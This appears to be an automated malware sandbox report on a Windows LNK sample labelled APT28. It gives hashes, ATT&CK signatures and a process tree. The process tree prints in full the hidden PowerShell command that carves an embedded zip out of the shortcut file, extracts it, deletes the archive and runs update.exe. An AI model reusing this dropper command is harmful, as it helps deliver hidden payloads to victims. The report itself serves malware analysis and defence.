Analysis

  • max time kernel
    118s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    19/11/2024, 11:26

General

  • Target

    APT28/2-Execution/lnk/Report.lnk

  • Size

    204KB

  • MD5

    ef4579d6e1e665056bc593ecbad1e473

  • SHA1

    de45b08deb1cccf50215a1318d83adf39d67f257

  • SHA256

    37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16

  • SHA512

    3ad5ef1e96a97009726322384a497ffedd5c48f6fc64ce7349adeabc99156f54df510f9cb5a5f49bc0d8b6a32a994756ea9b02f6dbff78f6ed2c7cc057d9d230

  • SSDEEP

    3072:J6LpD98Rr6vKDHJX0DPlHoPUBXgWXGMpgE6oLV2ISgA+4pOyB3yF3vxskk1GovNB:w4HhglHoyX8E6+V4gp9yBi3vxsXRb

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\APT28\2-Execution\lnk\Report.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00209578} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& .\update.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 00209578} | Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force | Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force | Out-Null;& .\update.exe
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2596

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2596-40-0x000007FEF6EFE000-0x000007FEF6EFF000-memory.dmp

    Filesize

    4KB

  • memory/2596-41-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2596-43-0x00000000021D0000-0x00000000021D8000-memory.dmp

    Filesize

    32KB

  • memory/2596-42-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/2596-44-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2596-45-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2596-46-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2596-50-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB